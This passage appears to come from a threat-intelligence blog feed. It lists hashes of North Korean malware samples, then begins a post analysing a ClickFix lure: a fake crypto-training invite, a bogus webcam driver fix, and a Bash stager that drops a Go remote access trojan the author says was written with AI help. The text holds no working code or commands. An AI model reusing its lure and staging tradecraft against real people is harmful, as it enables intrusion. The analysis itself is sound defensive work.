SHA256 (macrasv2) = 85bed283ba95d40d99e79437e6a3161336c94ec0acbc0cd38599d0fc9b2e393c
SHA256 (MauroDPRKSamples.zip) = cc31b3dc8aeed0af9dd24b7e739f183527d55d5b5ecd3d93ba45dd4aaa8ba260
SHA256 (minst2.bin) = 4b08a9e221a20b8024cf778d113732b3e12d363250231e78bae13b1f1dc1495b
SHA256 (OneDrive) = a9562ab6bce06e92d4e428088eacc1e990e67ceae6f6940047360261b5599614
SHA256 (SystemApp.zip) = 89616a503ffee8fc70f13c82c4a5e4fa4efafa61410971f4327ed38328af2938
SHA256 (TeamsApp.zip) = dfee6ea9cafc674b93a8460b9e6beea7f0eb0c28e28d1190309347fd1514dbb6
SHA256 (teamsSDK.bin) = 871d8f92b008a75607c9f1feb4922b9a02ac7bd2ed61b71ca752a5bed5448bf3
SHA256 (ZoomApp.zip) = 24af069b8899893cfc7347a4e5b46d717d77994a4b140d58de0be029dba686c9
Filename: localencode
Filename: OneDrive
Filename: teamsSDK.bin
Filename: D1YrHRTg.bin
Filename: D1yCPUyk.bin
Filename: minst2.bin
Filename: macrasv2</code></pre></div><div><hr></div><h2>References</h2><ul><li><p><a href="https://otx.alienvault.com/pulse/69d9c62d24ae9bc8d5653f56">LevelBlue Labs OTX - Original Intelligence Pulse by Quetzal Team.</a></p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!vf0A!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1337c34d-79fa-458d-9e68-0b5dfcd97974_1024x1024.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!vf0A!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1337c34d-79fa-458d-9e68-0b5dfcd97974_1024x1024.png 424w, https://substackcdn.com/image/fetch/$s_!vf0A!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1337c34d-79fa-458d-9e68-0b5dfcd97974_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!vf0A!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1337c34d-79fa-458d-9e68-0b5dfcd97974_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!vf0A!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1337c34d-79fa-458d-9e68-0b5dfcd97974_1024x1024.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!vf0A!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1337c34d-79fa-458d-9e68-0b5dfcd97974_1024x1024.png" width="238" height="238" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/1337c34d-79fa-458d-9e68-0b5dfcd97974_1024x1024.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1024,&quot;width&quot;:1024,&quot;resizeWidth&quot;:238,&quot;bytes&quot;:1289566,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/193629851?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1337c34d-79fa-458d-9e68-0b5dfcd97974_1024x1024.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!vf0A!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1337c34d-79fa-458d-9e68-0b5dfcd97974_1024x1024.png 424w, https://substackcdn.com/image/fetch/$s_!vf0A!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1337c34d-79fa-458d-9e68-0b5dfcd97974_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!vf0A!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1337c34d-79fa-458d-9e68-0b5dfcd97974_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!vf0A!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1337c34d-79fa-458d-9e68-0b5dfcd97974_1024x1024.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a><figcaption class="image-caption">Still here? Take a Limited Edition Mach-O Man</figcaption></figure></div>]]></content:encoded></item><item><title><![CDATA[North Korea's Safari: Poaching for Gophers]]></title><description><![CDATA[DPRK's Vibecodemaxxing Guide]]></description><link>https://quetzal.bitso.com/p/north-koreas-safari-poaching-for-064</link><guid isPermaLink="false">https://quetzal.bitso.com/p/north-koreas-safari-poaching-for-064</guid><dc:creator><![CDATA[Mauro Eldritch]]></dc:creator><pubDate>Wed, 04 Mar 2026 16:38:30 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!1Hvs!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fde7035c7-c818-4915-ba57-16a263b2a50a_1024x1536.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>Poaching is bad</strong>, <a href="https://quetzalteam.substack.com/p/north-koreas-safari-poaching-for">let me repeat myself</a>.</p><p>But do you know what&#8217;s worse? People who<strong> build malware</strong>.</p><p>And even worse than them? People who build <strong>malware for dictators</strong>.</p><p>But why stop there? Far below that moral abyss, something else lurks: <em>equinopods</em> (pony-heads) with weird haircuts that<strong> </strong>committed the worst sins in this land.</p><p>The first, in a <a href="https://en.wikipedia.org/wiki/Jorge_Luis_Borges">Borgesian</a> way, <a href="https://lyricstranslate.com/en/el-remordimiento-remorse.html">was never being happy</a>. Ever.</p><p>The second (and for me, <em>unforgivable</em>), to <strong><a href="https://en.wikipedia.org/wiki/Vibe_coding">vibecode</a></strong> <strong>malware</strong>. Not even being capable of building your own malicious code, failing miserably at being evil and yet, somehow, still getting the punishment.</p><p>This is the story of how we met again with an old acquaintance: a malware <s>written</s> <a href="https://en.wikipedia.org/wiki/Vibe_coding">vibecoded</a> in <strong>Go</strong> by our best sponsor, <strong><a href="https://www.crowdstrike.com/en-us/adversaries/famous-chollima/">Famous</a></strong><a href="https://www.crowdstrike.com/en-us/adversaries/famous-chollima/"> </a><strong><a href="https://www.crowdstrike.com/en-us/adversaries/famous-chollima/">Chollima</a></strong><a href="https://www.crowdstrike.com/en-us/adversaries/famous-chollima/">.</a> </p><p>And how we punished them back for weaponizing <a href="https://en.wikipedia.org/wiki/Clanker">clankers</a>.</p><div><hr></div><h2>Click<s>Break</s>Fix</h2><p>In the last year, our friends enriched their theatrical scripts, which included <a href="https://quetzal.bitso.com/p/docks">fake job interviews</a> and <a href="https://www.nknews.org/pro/north-korea-hackers-go-after-business-executives-in-latest-info-stealing-scheme/">simulated VC calls</a>, with a new charade dubbed <strong><a href="https://me-en.kaspersky.com/blog/what-is-clickfix/24030/">ClickFix</a></strong>: fake system errors that, when prompted, require the user to opportunistically <strong>download a fix</strong>, or <strong>copy and paste a &#8220;fixing&#8221; command into their terminals</strong>. </p><p>We all know where things go from there. If you don&#8217;t, pick <a href="https://en.wikipedia.org/wiki/Dante_Alighieri">Dante&#8217;s</a> <em>Inferno</em> and it will illustrate it enough.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!RkUg!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Febd8bda5-b0bf-44cf-9f6c-04ca37e6c6a4_1282x733.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!RkUg!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Febd8bda5-b0bf-44cf-9f6c-04ca37e6c6a4_1282x733.png 424w, https://substackcdn.com/image/fetch/$s_!RkUg!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Febd8bda5-b0bf-44cf-9f6c-04ca37e6c6a4_1282x733.png 848w, https://substackcdn.com/image/fetch/$s_!RkUg!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Febd8bda5-b0bf-44cf-9f6c-04ca37e6c6a4_1282x733.png 1272w, https://substackcdn.com/image/fetch/$s_!RkUg!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Febd8bda5-b0bf-44cf-9f6c-04ca37e6c6a4_1282x733.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!RkUg!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Febd8bda5-b0bf-44cf-9f6c-04ca37e6c6a4_1282x733.png" width="1282" height="733" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/ebd8bda5-b0bf-44cf-9f6c-04ca37e6c6a4_1282x733.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/2147fe75-d047-430c-9244-6d53ffaa9bd6_1282x733.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:733,&quot;width&quot;:1282,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:80004,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/189686575?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2147fe75-d047-430c-9244-6d53ffaa9bd6_1282x733.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!RkUg!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Febd8bda5-b0bf-44cf-9f6c-04ca37e6c6a4_1282x733.png 424w, https://substackcdn.com/image/fetch/$s_!RkUg!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Febd8bda5-b0bf-44cf-9f6c-04ca37e6c6a4_1282x733.png 848w, https://substackcdn.com/image/fetch/$s_!RkUg!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Febd8bda5-b0bf-44cf-9f6c-04ca37e6c6a4_1282x733.png 1272w, https://substackcdn.com/image/fetch/$s_!RkUg!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Febd8bda5-b0bf-44cf-9f6c-04ca37e6c6a4_1282x733.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">A fake troubleshooting window asking the user to run a command</figcaption></figure></div><p>When you run that tool or command, you are basically executing the task with <strong>your own privileges</strong>. Anything you have access to will be considered in the context in which you are invoking that task, aside from some built-in system protections which may <strong>or may not</strong> reduce the damage. </p><p>That being said, if you, for instance, run a <a href="https://www.malwarebytes.com/blog/threats/remote-access-trojan-rat#:~:text=Remote%20Access%20Trojans%20differ%20from,infection%20of%20the%20victim%20computer.">remote access trojan</a> (<strong>RAT</strong>) with your user, you are allowing a North Korean agent to remote into your machine<strong> with your very same privileges</strong>, pretty much like having them sitting down by your side.</p><p>But we&#8217;re not doing that. Do you know what we are doing instead?</p><p>Time for some malware slice and dice.</p><div><hr></div><h2>Do gophers dream of affordable RAM?</h2><p>Let&#8217;s start from the beginning: a faux <strong>LinkedIn invite to a Crypto Training,</strong> hosted on a phishing website mimicking the popular platform <strong>Canditech</strong>. </p><p>Once you join, <strong>of course something will go wrong</strong>. Their excuse of choice is always the same: <strong>your webcam</strong>. In order to allow the platform to access your webcam, you need to update your drivers. A <em>troubleshooting</em> <em>window</em> pops up and automagically tells you exactly what to do to solve this. Man, this is what I call good service. </p><p>But of course, these drivers are not what you think. Let&#8217;s pry them open. </p><p>Scalpel, please.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!BfuD!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F54227d26-5289-4bfa-9bd7-8dba091e8fb8_1992x1462.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!BfuD!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F54227d26-5289-4bfa-9bd7-8dba091e8fb8_1992x1462.png 424w, https://substackcdn.com/image/fetch/$s_!BfuD!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F54227d26-5289-4bfa-9bd7-8dba091e8fb8_1992x1462.png 848w, https://substackcdn.com/image/fetch/$s_!BfuD!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F54227d26-5289-4bfa-9bd7-8dba091e8fb8_1992x1462.png 1272w, https://substackcdn.com/image/fetch/$s_!BfuD!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F54227d26-5289-4bfa-9bd7-8dba091e8fb8_1992x1462.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!BfuD!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F54227d26-5289-4bfa-9bd7-8dba091e8fb8_1992x1462.png" width="1456" height="1069" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/54227d26-5289-4bfa-9bd7-8dba091e8fb8_1992x1462.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/4d6e7cb2-0fec-4568-9ca2-bb65083f16f2_1992x1462.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1069,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:759755,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/189686575?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4d6e7cb2-0fec-4568-9ca2-bb65083f16f2_1992x1462.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!BfuD!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F54227d26-5289-4bfa-9bd7-8dba091e8fb8_1992x1462.png 424w, https://substackcdn.com/image/fetch/$s_!BfuD!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F54227d26-5289-4bfa-9bd7-8dba091e8fb8_1992x1462.png 848w, https://substackcdn.com/image/fetch/$s_!BfuD!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F54227d26-5289-4bfa-9bd7-8dba091e8fb8_1992x1462.png 1272w, https://substackcdn.com/image/fetch/$s_!BfuD!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F54227d26-5289-4bfa-9bd7-8dba091e8fb8_1992x1462.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">&#8220;macPatch.sh&#8221;, our &#8220;driver fixer tool&#8221;.</figcaption></figure></div><p>If you are running macOS like me, the website will prompt you to run a command which will download this <strong>Bash script</strong>. This is a stager that will download the <strong>Go</strong> language interpreter and a fake <strong>DriverFixerNow</strong> macOS app using <strong>Google Chrome&#8217;s icon</strong>, and then drop a <strong>malware written in Go </strong>inside a compressed file called &#8220;<em>update.zip</em>&#8221;. </p><p>Now if you ask me, Go is a somewhat <strong>odd choice for the DPRK</strong>, as they usually go for <strong><a href="https://any.run/cybersecurity-blog/ottercookie-malware-analysis/">JavaScript</a></strong> and <strong><a href="https://any.run/cybersecurity-blog/invisibleferret-malware-analysis/">Python</a></strong>. Actually, the last time I saw them touching Go was when they <s>repurposed</s> <em>vibecoded</em> <strong>GoLangGhostRAT</strong> to create a <strong>Python</strong> port which we dubbed <strong><a href="https://any.run/cybersecurity-blog/pylangghost-malware-analysis/">PyLangGhostRAT</a></strong> (and as you may have correctly guessed, it had the quality you&#8217;d expect from a Norkie vibecoder).</p><p>Weird is our specialty, so let&#8217;s do this. But let me warn you, <strong>it only gets weirder</strong>.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!vwEM!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F271ffc77-bb59-4920-9770-4d0a8726106c_1992x1652.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!vwEM!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F271ffc77-bb59-4920-9770-4d0a8726106c_1992x1652.png 424w, https://substackcdn.com/image/fetch/$s_!vwEM!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F271ffc77-bb59-4920-9770-4d0a8726106c_1992x1652.png 848w, https://substackcdn.com/image/fetch/$s_!vwEM!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F271ffc77-bb59-4920-9770-4d0a8726106c_1992x1652.png 1272w, https://substackcdn.com/image/fetch/$s_!vwEM!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F271ffc77-bb59-4920-9770-4d0a8726106c_1992x1652.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!vwEM!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F271ffc77-bb59-4920-9770-4d0a8726106c_1992x1652.png" width="1456" height="1207" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/271ffc77-bb59-4920-9770-4d0a8726106c_1992x1652.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/050d9a90-3b3a-4549-a21e-6772cf5e674e_1992x1652.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1207,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:855331,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/189686575?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F050d9a90-3b3a-4549-a21e-6772cf5e674e_1992x1652.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!vwEM!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F271ffc77-bb59-4920-9770-4d0a8726106c_1992x1652.png 424w, https://substackcdn.com/image/fetch/$s_!vwEM!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F271ffc77-bb59-4920-9770-4d0a8726106c_1992x1652.png 848w, https://substackcdn.com/image/fetch/$s_!vwEM!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F271ffc77-bb59-4920-9770-4d0a8726106c_1992x1652.png 1272w, https://substackcdn.com/image/fetch/$s_!vwEM!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F271ffc77-bb59-4920-9770-4d0a8726106c_1992x1652.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">My programming professor would have chased me with a <a href="https://sib.ucab.edu.ve/cgi-bin/koha/opac-image.pl?imagenumber=55437">dinosaurs book</a> if I wrote this thing</figcaption></figure></div><p>What a surprise! <strong><a href="https://en.wikipedia.org/wiki/Clanker">Clanker</a> footprints everywhere!</strong> </p><p>Everything is so <strong>overexplained</strong>! Why so many <strong>comments</strong>? </p><p>Why is every single step not only <strong>numbered</strong> but <strong>commented</strong>, and also having a <strong>verbose</strong> <strong>output to the console</strong>? Who are you trying to help debug your malware, the user? </p><p>Why the space after the comment sign and the comment itself? None of my [<em>human] </em>devs do that. </p><p>Why do you need to comment out your evil plan step by step like some kind of weird Class B villain who is just about to get busted and could have easily gotten away with everything by just executing it instead of giving a TED talk? </p><p>That&#8217;s definitely weird and screams: &#8220;<em><a href="https://github.com/anthropics/claude-code/issues/3382">You&#8217;re absolutely right!</a> &#8211; That&#8217;s on me! I messed up! Let me address it real quick &#128640;!</em>&#8221;</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!bjiH!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5d1c9ccf-8596-4f78-a57e-a01da5f6943a_1992x1652.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!bjiH!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5d1c9ccf-8596-4f78-a57e-a01da5f6943a_1992x1652.png 424w, https://substackcdn.com/image/fetch/$s_!bjiH!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5d1c9ccf-8596-4f78-a57e-a01da5f6943a_1992x1652.png 848w, https://substackcdn.com/image/fetch/$s_!bjiH!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5d1c9ccf-8596-4f78-a57e-a01da5f6943a_1992x1652.png 1272w, https://substackcdn.com/image/fetch/$s_!bjiH!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5d1c9ccf-8596-4f78-a57e-a01da5f6943a_1992x1652.png 1456w" sizes="100vw"><img 